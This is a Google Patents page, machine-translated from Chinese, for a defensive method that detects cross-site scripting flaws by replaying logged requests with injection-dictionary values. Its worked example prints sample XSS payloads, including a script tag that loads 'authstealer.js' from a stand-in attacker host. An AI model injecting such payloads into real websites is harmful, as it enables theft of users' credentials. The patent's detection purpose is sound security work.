CN105049440B - Detect the method and system of cross-site scripting attack injection - Google Patents
Detect the method and system of cross-site scripting attack injection Download PDFInfo
- Publication number
- CN105049440B CN105049440B CN201510476875.3A CN201510476875A CN105049440B CN 105049440 B CN105049440 B CN 105049440B CN 201510476875 A CN201510476875 A CN 201510476875A CN 105049440 B CN105049440 B CN 105049440B
- Authority
- CN
- China
- Prior art keywords
- request
- injection
- module
- parameter
- attack
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer And Data Communications (AREA)
Abstract
The invention discloses a kind of method and system for detecting cross-site scripting attack injection, wherein method includes:The Request Log that reverse proxy module record user accesses;Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;The parameter name and parameter value in the URL parameter are detected respectively;The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;Send the second request and arrive destination server, and receive return respond request;Whether judge in the return respond request containing attack content;If so, then the URL parameter is included in injection risk list.By the above-mentioned means, the present invention can more comprehensively detect XSS leaks present in website, the risk of user under fire is reduced, improves site safety, and the URL that the mode for comparing reptile detects is more complete.
Description
Technical field
The present invention relates to a kind of method and system for detecting cross-site scripting attack injection.
Background technology
So-called cross-site scripting attack (Cross Site Scripting), for the CSS (Cascading that gets along well
Style Sheets, CSS) abbreviation obscure, therefore cross-site scripting attack is abbreviated as XSS.Malicious attacker is inserted toward in Web page
Enter malice html codes, when user browses the page, being embedded the html codes inside Web can be performed, so as to reach
The specific purposes of malicious attack user.
XSS is a kind of computer security leak frequently appeared in web applications, and it allows malice web user by code
It is implanted in the page for being supplied to other users to use.For example these codes include HTML code and client script.Attacker
Access control is bypassed using XSS leaks --- such as origin policy (same origin policy).Such leak
Become to be widely known by the people due to being used by a hacker to write the bigger phishing of harmfulness (Phishing) attack.For across station pin
This attack, hacker's circle common recognition are:Cross-site scripting attack is new " buffer overflow attack ", and JavaScript is new
“ShellCode”。
Current many websites are found the leak that cross-site script be present, are all much to website progress time using reptile
Go through, so handle, request tracking can be caused not comprehensive enough, tested sufficiently complete.
Existing patent application (application number:201510046908.0) propose it is a kind of across station vulnerability scanning method and system,
Methods described comprises the following steps:Link to the whole station or single-page of targeted sites crawls;To crawling obtained link
Filtered with preparatory condition, it is multiple potential across station leak link to obtain;Using vector of attack to each described potential across station
Leak link carries out fuzz testing;It is each described potential across station leak using being checked in browsing module during fuzz testing
The webpage source code of link carries out dynamic analysis, to judge that potential linked across station leak whether there is across station leak;There will be
Preserved across the vector of attack of link and the corresponding loading of station leak to database.The patent is to each potential using vector of attack
Link carries out fuzz testing, and workload is big, requires high to hardware configuration.
The content of the invention
The technical problems to be solved by the invention are:By configuring reverse proxy module, and according to all solicited messages, carry
Variable element is taken, injection test dictionary, cross-site scripting attack test is carried out, to obtain return value, and then realizes more comprehensive
XSS leaks present in website are detected, the risk of user under fire is reduced, improves site safety, and compare the side of reptile
The URL of formula detection is more complete.
In order to solve the above-mentioned technical problem, the technical solution adopted by the present invention is:A kind of detection cross-site scripting attack is provided
The method of injection, including:
The Request Log that reverse proxy module record user accesses;
Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;
The parameter name and parameter value in the URL parameter are detected respectively;
The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;
Send the second request and arrive destination server, and receive return respond request;
Whether judge in the return respond request containing attack content;
If so, then the URL parameter is included in injection risk list.
To solve the above problems, the present invention also provides a kind of system for detecting cross-site scripting attack injection, including:
Reverse proxy module, for recording the Request Log of user's access;
Classification preserving module, for carrying out grouping and classifying to the Request Log, URL parameter is generated, and preserve;
Detection module, for detecting parameter name and parameter value in the URL parameter;
Generation module is replaced, it is raw for replacing the parameter value as corresponding content in script injection attacks dictionary list
Into the second request;
Sending/receiving module, destination server is arrived for sending the second request, and receive return respond request;
Judge module, for whether judging in the return respond request containing attack content;
List block, for the URL parameter to be included in injection risk list.
The beneficial effects of the present invention are:Prior art is different from, by configuring reverse proxy module, and ask the visitor according to institute
Information is sought, variable element is extracted, injection test dictionary, carries out cross-site scripting attack test, to obtain return value, and then realize more
Add XSS leaks present in comprehensive detection website, reduce the risk of user under fire, improve site safety, and compare
The URL that the mode of reptile detects is more complete.
Brief description of the drawings
Fig. 1 is the schematic flow sheet of the inventive method embodiment one;
Fig. 2 is the schematic flow sheet of the inventive method embodiment two;
Fig. 3 is the structured flowchart of present system embodiment three;
Fig. 4 is the structured flowchart of present system example IV.
Embodiment
To describe the technology contents of the present invention, the objects and the effects in detail, below in conjunction with embodiment and coordinate attached
Figure is explained.
The design of most critical of the present invention is:Analyzed, replacement processing, led to by injecting request to cross-site scripting attack
The request of transmission second is crossed to judge respond request, realizes that detection cross-site scripting attack is injected into system.
Fig. 1 is refer to, the embodiment of the present invention one provides a kind of method for detecting cross-site scripting attack, comprised the following steps:
S1:The Request Log that reverse proxy module record user accesses;
S2:Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;
S3:The parameter name and parameter value in the URL parameter are detected respectively;
S4:The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;
S5:Send the second request and arrive destination server, and receive return respond request;
S6:Whether judge in the return respond request containing attack content;
If so, then perform step S7:The URL parameter is included in injection risk list.
As shown in Fig. 2 on the basis of embodiment one, before the step S1 of the embodiment of the present invention two, in addition to:
S01:Configure reverse proxy module;
S02:Domain name is parsed to reverse proxy module.
Wherein, step S4 is specially:
S41:Parameter value is replaced with to corresponding content in script injection attacks dictionary list successively;
S42:After replacing successively, corresponding at least one second request of generation.
Wherein, after step S6, in addition to:
If it is not, then perform step S70:Ignore the return respond request.
In a specific embodiment, following prepare can be made in advance before being on the defensive:
Reverse proxy module is configured, for recording all Request Logs of user's access.And reverse proxy module can be
Reverse Proxy, the application program containing journal function that can also be carried with system, such as iis, apache, nginx
Deng proxy server is usually the client of user, and Reverse Proxy is used for service end.
The advantage of journal function of the configuration reverse proxy module with directly being carried using system is, without changing original clothes
Business device configuration, need to only be configured in Reverse Proxy.
And upon configuration, translate domain names into the reverse proxy module.
In specific test process, user accesses Reverse Proxy, and Reverse Proxy can record user's visit
The content of all requests of website is asked, is preserved as Request Log.Then, the URL of Request Log is entered by URL and its parameter
Row grouping and classifying, generate the URL parameter of website.Specifically, can pass throughURL is split with &, such as:http://abc.com/id
=1&name=abc.Its parameter name is id and name and corresponding parameter value is respectively 1 and abc;Wherein URL not containing parameters
Part is http://abc.com/.
The parameter name in the URL of above-mentioned preservation is detected again with parameter value respectively by program, by parameter value 1
Corresponding content in conventional script injection attacks dictionary list is replaced with, the request after being replaced with generation, i.e., the second request.
Specifically, keyword can be passed throughURL is split with &, you can parameter value replacement is carried out by regular expression successively
(form is:Parameter name=parameter).The corresponding content wherein attacked in dictionary list is exactly that common are possible inject
Keyword or block, such as:<script></script>Tag block and, the keyword such as onclick, javascript.Should
When understanding, because content is possible to more than one in attack dictionary list, therefore after replacement, at least one replace can be generated
Request after changing.
Request after replacement is re-transmitted to destination server, and detects and returns in respond request with the presence or absence of in attack
Hold.
Usually, detected website can be transmitted.HTTP request is sent to accessed detected website, is detected website
A http response can be returned, whether then detects wherein content comprising the attack content in request.
If this URL parameter is included in and existed in XSS injection risk lists comprising attack content in detection request.
If not including attack content in detection request, directly ignore the return respond request.And send next second
Ask in destination server, step S5~S7 is performed with circulation, the request after having detected all replacements, will be met the requirements
URL parameter be included in and exist in XSS injection risk lists.
Concrete example is as follows:In http:In //abc.com/ websites, Get is have recorded in the daily record of reverse proxy
http://abc.com/This request of id=1.By script injection attacks dictionary, (dictionary has contained many kinds can be with
The use-case of injection, for testing one by one) parameter value 1 is substituted for attack string in dictionary (i.e. in list by regular expression
Corresponding content).
Such as:http://abc.com/Id=<Script type='text/javascript'>alert('pwnd');
</script>;Or
<Script type='text/javascript'>alert('pwnd');</script>;Or
<Script%20src=" http://mallorysevilsite.com/authstealer.js">.
Such as this example replaces with $ 1 using regular expression (id=) [^ &] *<Script type='text/
javascript'>alert('pwnd');</script>
As a result it is http://abc.com/Id=<Script type='text/javascript'>alert('
pwnd');</script>] attack string.
Then detection returns in the content of response whether include this script, and is not by escape.Then illustrate this URL
Injection risk be present.
In summary, the embodiment of the present invention records Request Log by reverse proxy module, and parses domain name, to daily record point
After group is sorted out, URL parameter is generated, using the basis as defence and is prepared;Injection test dictionary is reused, XSS is carried out to parameter
Injection test, whether return value therein is obtained containing attack content, is included in finally assert in injection risk list.Cause
XSS injection loopholes present in website during this embodiment of the present invention two can be detected more comprehensively, reduce user under fire
Risk, site safety is improved, and the URL that the mode for comparing reptile detects is more complete.
Hold, as shown in figure 3, the embodiment of the present invention three provides a kind of system 100 for detecting cross-site scripting attack, including:
Reverse proxy module 110, for recording the Request Log of user's access;
Classification preserving module 120, for carrying out grouping and classifying to the Request Log, URL parameter is generated, and preserve;
Detection module 130, for detecting parameter name and parameter value in the URL parameter;
Generation module 140 is replaced, for replacing the parameter value as corresponding content in script injection attacks dictionary list,
The request of generation second;
Sending/receiving module 150, destination server 200 is arrived for sending the second request, and receive return respond request;
Judge module 160, for whether judging in the return respond request containing attack content;
List block 170, for the URL parameter to be included in into injection risk list.
Wherein, the system 100 of present example four, in addition to:
Configuration module 180, for configuring reverse proxy service module;
Parsing module 190, for parsing domain name to reverse proxy service module.
Wherein, replacing generation module 140 also includes:
Replacement unit 141, for parameter value to be replaced with to corresponding content in script injection attacks dictionary list successively;
Generation unit 142, for after replacing successively, corresponding generation second to be asked.
Wherein, after attack content is not contained during judge module 160 judges the return respond request, then described return is ignored
Return respond request.
Embodiments of the invention are the foregoing is only, are not intended to limit the scope of the invention, it is every to utilize this hair
The equivalents that bright specification and accompanying drawing content are made, or the technical field of correlation is directly or indirectly used in, similarly include
In the scope of patent protection of the present invention.
Claims (6)
- A kind of 1. method for detecting cross-site scripting attack injection, it is characterised in that including:The Request Log that reverse proxy module record user accesses;Grouping and classifying is carried out to the Request Log, generates URL parameter, and preserve;The parameter name and parameter value in the URL parameter are detected respectively;The parameter value is replaced as corresponding content in script injection attacks dictionary list, the request of generation second;Send the second request and arrive destination server, and receive return respond request;Whether judge in the return respond request containing attack content;If so, then the URL parameter is included in injection risk list;Wherein, the step of it is corresponding content in script injection attacks dictionary list to replace the parameter value, and generation second is asked Specially:Parameter value is replaced with to corresponding content in script injection attacks dictionary list successively;After replacing successively, corresponding at least one second request of generation.
- 2. the method for cross-site scripting attack injection is detected according to claim 1, it is characterised in that reverse proxy service module Before the step of recording user access request daily record, in addition to:Configure reverse proxy module;Domain name is parsed to reverse proxy module.
- 3. the method for cross-site scripting attack injection is detected according to claim 1, it is characterised in that judge that described return responds After the step of whether containing attack content in request, in addition to:If it is not, then ignore the return respond request.
- A kind of 4. system for detecting cross-site scripting attack injection, it is characterised in that including:Reverse proxy module, for recording the Request Log of user's access;Classification preserving module, for carrying out grouping and classifying to the Request Log, URL parameter is generated, and preserve;Detection module, for detecting parameter name and parameter value in the URL parameter;Generation module is replaced, for replacing the parameter value as corresponding content in script injection attacks dictionary list, generation the Two requests;Sending/receiving module, destination server is arrived for sending the second request, and receive return respond request;Judge module, for whether judging in the return respond request containing attack content;List block, for the URL parameter to be included in injection risk list.
- 5. the system of cross-site scripting attack injection is detected according to claim 4, it is characterised in that also include:Configuration module, for configuring reverse proxy service module;Parsing module, for parsing domain name to reverse proxy service module.
- 6. the system of cross-site scripting attack injection is detected according to claim 4, it is characterised in that judge institute in judge module State after attack content is not contained in return respond request, then ignore the return respond request.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201510476875.3A CN105049440B (en) | 2015-08-06 | 2015-08-06 | Detect the method and system of cross-site scripting attack injection |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201510476875.3A CN105049440B (en) | 2015-08-06 | 2015-08-06 | Detect the method and system of cross-site scripting attack injection |
Publications (2)
Publication Number | Publication Date |
---|---|
CN105049440A CN105049440A (en) | 2015-11-11 |
CN105049440B true CN105049440B (en) | 2018-04-10 |
Family
ID=54455651
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201510476875.3A Active CN105049440B (en) | 2015-08-06 | 2015-08-06 | Detect the method and system of cross-site scripting attack injection |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN105049440B (en) |
Families Citing this family (10)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN107948120B (en) * | 2016-10-12 | 2020-11-24 | 阿里巴巴集团控股有限公司 | Vulnerability detection method and device |
CN106446694A (en) * | 2016-12-13 | 2017-02-22 | 四川长虹电器股份有限公司 | Xss vulnerability mining system based on network crawlers |
CN108632219B (en) * | 2017-03-21 | 2021-04-27 | 腾讯科技(深圳)有限公司 | Website vulnerability detection method, detection server, system and storage medium |
CN108667770B (en) * | 2017-03-29 | 2020-12-18 | 腾讯科技(深圳)有限公司 | Website vulnerability testing method, server and system |
CN109040054B (en) * | 2018-07-30 | 2020-12-04 | 杭州迪普科技股份有限公司 | URL filtering test method and device |
CN111104675A (en) * | 2019-11-15 | 2020-05-05 | 泰康保险集团股份有限公司 | Method and device for detecting system security vulnerability |
CN113364815B (en) * | 2021-08-11 | 2021-11-23 | 飞狐信息技术(天津)有限公司 | Cross-site scripting vulnerability attack defense method and device |
CN113965363B (en) * | 2021-10-11 | 2023-07-14 | 北京天融信网络安全技术有限公司 | Vulnerability research and judgment method and device based on Web user behaviors |
CN114205123A (en) * | 2021-11-20 | 2022-03-18 | 湖北天融信网络安全技术有限公司 | Attack and defense confrontation-based threat hunting method, device, equipment and storage medium |
CN114816558B (en) * | 2022-03-07 | 2023-06-30 | 深圳市九州安域科技有限公司 | Script injection method, equipment and computer readable storage medium |
Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102880830A (en) * | 2011-07-15 | 2013-01-16 | 华为软件技术有限公司 | Acquisition method and device of original test data |
CN102999420A (en) * | 2011-09-13 | 2013-03-27 | 阿里巴巴集团控股有限公司 | XSS (Cross Site Scripting) testing method and XSS testing system based on DOM (Document Object Model) |
CN103023869A (en) * | 2012-11-02 | 2013-04-03 | 北京奇虎科技有限公司 | Malicious attack prevention method and browser |
Family Cites Families (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103067344B (en) * | 2011-10-24 | 2016-03-30 | 国际商业机器公司 | The noninvasive method of automatic distributing safety regulation and equipment in cloud environment |
-
2015
- 2015-08-06 CN CN201510476875.3A patent/CN105049440B/en active Active
Patent Citations (3)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN102880830A (en) * | 2011-07-15 | 2013-01-16 | 华为软件技术有限公司 | Acquisition method and device of original test data |
CN102999420A (en) * | 2011-09-13 | 2013-03-27 | 阿里巴巴集团控股有限公司 | XSS (Cross Site Scripting) testing method and XSS testing system based on DOM (Document Object Model) |
CN103023869A (en) * | 2012-11-02 | 2013-04-03 | 北京奇虎科技有限公司 | Malicious attack prevention method and browser |
Also Published As
Publication number | Publication date |
---|---|
CN105049440A (en) | 2015-11-11 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
CN105049440B (en) | Detect the method and system of cross-site scripting attack injection | |
Kirda et al. | Client-side cross-site scripting protection | |
US9398031B1 (en) | Malicious advertisement detection and remediation | |
Likarish et al. | Obfuscated malicious javascript detection using classification techniques | |
US9268937B1 (en) | Mitigating malware | |
US8347392B2 (en) | Apparatus and method for analyzing and supplementing a program to provide security | |
US8555391B1 (en) | Adaptive scanning | |
US8683584B1 (en) | Risk assessment | |
US8949990B1 (en) | Script-based XSS vulnerability detection | |
US20140173736A1 (en) | Method and system for detecting webpage Trojan embedded | |
WO2017056121A1 (en) | Method for the identification and prevention of client-side web attacks | |
Fraiwan et al. | Analysis and identification of malicious javascript code | |
CN103617390A (en) | Malicious webpage judgment method, device and system | |
Rao et al. | Two for the price of one: A combined browser defense against XSS and clickjacking | |
Zhang et al. | Detecting malicious activities with user‐agent‐based profiles | |
Choi et al. | HXD: Hybrid XSS detection by using a headless browser | |
US9923916B1 (en) | Adaptive web application vulnerability scanner | |
Samarasinghe et al. | On cloaking behaviors of malicious websites | |
Canfora et al. | A set of features to detect web security threats | |
Kishore et al. | Browser JS Guard: Detects and defends against Malicious JavaScript injection based drive by download attacks | |
CN105072109B (en) | Prevent the method and system of cross-site scripting attack | |
Maurya | Positive security model based server-side solution for prevention of cross-site scripting attacks | |
Krishnaveni et al. | Multiclass classification of XSS web page attack using machine learning techniques | |
Das et al. | Detection of cross-site scripting attack under multiple scenarios | |
Barhoom et al. | A new server-side solution for detecting cross site scripting attack |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
C06 | Publication | ||
PB01 | Publication | ||
C10 | Entry into substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |